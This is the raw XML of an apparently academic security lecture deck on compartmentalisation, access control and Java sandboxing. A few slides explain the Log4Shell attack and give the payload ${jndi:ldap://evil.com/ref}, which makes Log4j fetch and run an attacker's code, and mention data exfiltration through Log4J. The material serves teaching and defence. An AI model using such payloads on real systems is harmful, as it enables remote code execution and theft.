                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JNDI references, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. tell where to fetch the object </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rmi://server.com/reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ldap://server.com/reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="566968" lvl="1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</a:rPr>
              <a:t>Another option is to let a JDNI reference point to a (remote) factory class to create the object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1764" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82663BF7-6496-E64C-0389-EE5EBEFC32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541338"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 marL="817563" indent="-314325" defTabSz="541338"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 marL="1258888" indent="-250825" defTabSz="541338"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 marL="1763713" indent="-250825" defTabSz="541338"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 marL="2266950" indent="-250825" defTabSz="541338"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7241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31813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6385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40957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97F6D133-7A38-4DB0-9EBB-7FFE3DDAF961}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263550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CA74D291-8FA9-32CB-B32D-C01FBF764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Compartmentalisation examples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05901A-4F60-5437-0853-41E92BC9A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GB" dirty="0"/>
              <a:t>Compartmentalisation can be applied on many levels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In an organisation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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> terrorist cells in Al Qaida or extreme animal rights group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In an IT system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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> different machines for different tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On a single computer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different processes for different tasks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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different user accounts for different task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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use virtual machines to isolate tasks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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>partition your hard disk &amp; install two OSs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inside a program / application / app / process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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different ‘modules’ with different tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83FB0CEE-A731-312C-0241-A3CADD40C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CBE74CF0-9D39-472D-9D2B-C73CC877723E}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Pijl-links 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{706B5A60-4E12-9ED8-8812-8CCC2B16E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5502275"/>
            <a:ext cx="977900" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4986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2929B99-7F75-036D-E89B-43AFE74C4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738" y="5391150"/>
            <a:ext cx="1212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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Focus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of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el 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4F94BC-F2E2-F1D0-6F5F-83F21B7B4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Log4J attack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7B58EA-638D-61AA-42E0-89CDAF9A0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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>Attacker provides some input that is a JDNI lookup pointing to their own server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://evil.com/ref}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>If that user input is logged, Log4j will retrieve the corresponding object from the attacker’s server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>Attacker’s server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t> can reply with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>a serialised object, which will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0" err="1"/>
              <a:t>deserialised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1984" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>a JNDI reference to another server hosting the class; JDNI looks up that reference, and downloads &amp; executes class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="440975">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>Attacker’s code runs on the victim’s machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="125993" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0"/>
              <a:t>Alternatively, attacker can abuse gadgets available on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1"/>
              <a:t>ClassPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0"/>
              <a:t> on the victim’s machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="503972" lvl="1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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95236" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEC7382F-6DCE-EC8F-C2A2-83C6E87810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541338"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 marL="817563" indent="-314325" defTabSz="541338"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 marL="1258888" indent="-250825" defTabSz="541338"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 marL="1763713" indent="-250825" defTabSz="541338"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 marL="2266950" indent="-250825" defTabSz="541338"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7241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31813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6385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40957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BF3F69A1-0589-43B5-975A-C4F31B7C5761}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31251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el 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51075B6A-B833-1494-02AB-608E75188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 data exfiltration using Log4J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AB7C84-5C4F-CCE8-C00B-69D2EF5A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230313"/>
            <a:ext cx="8555037" cy="5803900"/>
          </a:xfrm>
        </p:spPr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1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96260" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E7FDA3-7B79-CC3C-8FAC-2F3460D08E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541338"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 marL="817563" indent="-314325" defTabSz="541338"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 marL="1258888" indent="-250825" defTabSz="541338"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 marL="1763713" indent="-250825" defTabSz="541338"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 marL="2266950" indent="-250825" defTabSz="541338"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7241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31813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6385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4095750" indent="-250825" defTabSz="54133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A54E663E-8669-4353-BCC1-86308E23D0AC}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="96261" name="Afbeelding 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667BA64E-FFC3-B4C3-377E-E8A16C10C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398588"/>
            <a:ext cx="8823325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013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0FD9DFB6-6A1A-18DD-6181-0F6C1CD50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Isolation vs CIA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000"/>
              <a:t> (Confidentiality, Integrity &amp; Availability)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Tijdelijke aanduiding voor inhoud 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0246ADB-FF2B-97C3-F952-D2F9FB240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altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Isolation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t> is a very useful security property for programs and processes (i.e. program in execution)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endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t>‘isolation’ can be understood in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t> terms, as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en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>confidentiality and integrity of both data and code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t>, 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en-GB" altLang="en-US" dirty="0"/>
              <a:t>but conceptually less clear</a:t>
            </a:r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D9549AEE-D4BB-8821-CABB-350360BCAA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0435FBD2-FFDD-408B-8379-EAACEA9250FE}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10245" name="Groep 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2CD0C0F-8983-2D17-0D82-55483B0BF8B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2735263" y="2006600"/>
            <a:ext cx="1235075" cy="1522413"/>
            <a:chOff x="1295896" y="2280132"/>
            <a:chExt cx="1234540" cy="1522731"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10247" name="Groep 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB33AB8-845A-07A3-8EEB-348F45D544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896" y="2280132"/>
              <a:ext cx="1213119" cy="1381381"/>
              <a:chOff x="3475881" y="1466437"/>
              <a:chExt cx="2059661" cy="1758675"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10250" name="Rectangle 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A6FCCEC-28A7-2C09-8E8C-63AD10391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7056" y="1466437"/>
                <a:ext cx="318486" cy="1746425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nl-NL" altLang="nl-NL"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10251" name="Rectangle 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30A3C337-0032-BAE9-3067-E6C4B2795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5881" y="1478687"/>
                <a:ext cx="318486" cy="1746425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nl-NL" altLang="nl-NL"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10248" name="Freeform 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A3843B-31B0-0EB0-0F74-C0C3BE76B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60" y="2496156"/>
              <a:ext cx="115577" cy="1009489"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 2147483646 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 2147483646 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 2147483646 h 5345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770" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="534572"/>
                  </a:cubicBez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0249" name="Content Placeholder 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C8FC82-F3CA-5745-8B67-DF1FA02AA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0" t="20293" r="-2" b="2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1295896" y="3635821"/>
              <a:ext cx="1234540" cy="167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0246" name="Freeform 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A08C700-9E38-A7DF-0D07-6704757CFE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4868863" y="2019300"/>
            <a:ext cx="144462" cy="1927225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 212770"/>
              <a:gd name="T1" fmla="*/ 0 h 534572"/>
              <a:gd name="T2" fmla="*/ 0 w 212770"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 534572"/>
              <a:gd name="T4" fmla="*/ 0 w 212770"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 534572"/>
              <a:gd name="T6" fmla="*/ 0 w 212770"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 534572"/>
              <a:gd name="T8" fmla="*/ 0 w 212770"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 5345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770" h="534572">
                <a:moveTo>
                  <a:pt x="57291" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="139352" y="62132"/>
                  <a:pt x="221414" y="124264"/>
                  <a:pt x="212036" y="168812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="202658" y="213360"/>
                  <a:pt x="15088" y="225083"/>
                  <a:pt x="1020" y="267286"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-13048" y="309489"/>
                  <a:pt x="122941" y="377484"/>
                  <a:pt x="127630" y="422031"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132319" y="466578"/>
                  <a:pt x="5710" y="525194"/>
                  <a:pt x="29156" y="534572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0">
          <a:lnSpc>
            <a:spcPct val="11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Comic Sans M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0">
          <a:lnSpc>
            <a:spcPct val="11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Comic Sans MS" pitchFamily="6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3940</TotalTime>
  <Words>6065</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>1084</Paragraphs>
  <Slides>81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2" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Bahnschrift</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Today</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Titanic</vt:lpstr>
      <vt:lpstr>Compartmentalisation example: SIM card in phone</vt:lpstr>
      <vt:lpstr>Compartmentalisation examples</vt:lpstr>
      <vt:lpstr>Isolation vs CIA (Confidentiality, Integrity &amp; Availability)</vt:lpstr>
      <vt:lpstr>Two use cases for compartments</vt:lpstr>
      <vt:lpstr>Compartmentalisation</vt:lpstr>
      <vt:lpstr>Access control</vt:lpstr>
      <vt:lpstr>Compartmentalisation for security design</vt:lpstr>
      <vt:lpstr>Operating System (OS) Access Control</vt:lpstr>
      <vt:lpstr>Classical OS-based security (reminder)</vt:lpstr>
      <vt:lpstr>Signs of OS access control</vt:lpstr>
      <vt:lpstr>Problems with OS access control</vt:lpstr>
      <vt:lpstr>Example: complexity (resulting in privilege escalation)  </vt:lpstr>
      <vt:lpstr>Privilege escalation in Windows XP</vt:lpstr>
      <vt:lpstr>chroot jail</vt:lpstr>
      <vt:lpstr>Limits in granularity</vt:lpstr>
      <vt:lpstr>Limitation of classic OS access control</vt:lpstr>
      <vt:lpstr>Example: compartmentalisation in Chrome</vt:lpstr>
      <vt:lpstr>More compartmentalisation in browsers</vt:lpstr>
      <vt:lpstr>Language-level access control</vt:lpstr>
      <vt:lpstr>Access control at the language level</vt:lpstr>
      <vt:lpstr> Language-level sandboxing on top of OS sandboxing</vt:lpstr>
      <vt:lpstr>Sand-boxing with code-based access control</vt:lpstr>
      <vt:lpstr>Sand-boxing with code-based access control</vt:lpstr>
      <vt:lpstr>  Code-based access control in Java</vt:lpstr>
      <vt:lpstr>Protection domains</vt:lpstr>
      <vt:lpstr>Permissions</vt:lpstr>
      <vt:lpstr>  Last week: code-based access control in Java</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Complication: methods calls</vt:lpstr>
      <vt:lpstr>Complication: method calls</vt:lpstr>
      <vt:lpstr>Exposing dangerous functionality, (in)securely</vt:lpstr>
      <vt:lpstr>Using visibility to control access?</vt:lpstr>
      <vt:lpstr>Stack walking</vt:lpstr>
      <vt:lpstr>Stack walking: basic concepts</vt:lpstr>
      <vt:lpstr>Stack walking</vt:lpstr>
      <vt:lpstr>Stack walk modifiers</vt:lpstr>
      <vt:lpstr>Stack walking: algorithm</vt:lpstr>
      <vt:lpstr>Stack walk modifiers: examples</vt:lpstr>
      <vt:lpstr>Stack walk modifiers: examples</vt:lpstr>
      <vt:lpstr>Stack walk modifiers: examples</vt:lpstr>
      <vt:lpstr>Using stack walking to restrict access to functionality</vt:lpstr>
      <vt:lpstr>Typical programming pattern </vt:lpstr>
      <vt:lpstr>Spot the security flaw?</vt:lpstr>
      <vt:lpstr>TOCTOU attack (Time of Check, Time of Use)</vt:lpstr>
      <vt:lpstr>Need for privilege elevation</vt:lpstr>
      <vt:lpstr>Security flaw in code signing check (Magic Coat)</vt:lpstr>
      <vt:lpstr>Security flaw in code signing check (Magic Coat)</vt:lpstr>
      <vt:lpstr>tot hier</vt:lpstr>
      <vt:lpstr>Java safety &amp; security guarantees</vt:lpstr>
      <vt:lpstr>Components of the Java Runtime  </vt:lpstr>
      <vt:lpstr>TCB for Java’s code-based access control</vt:lpstr>
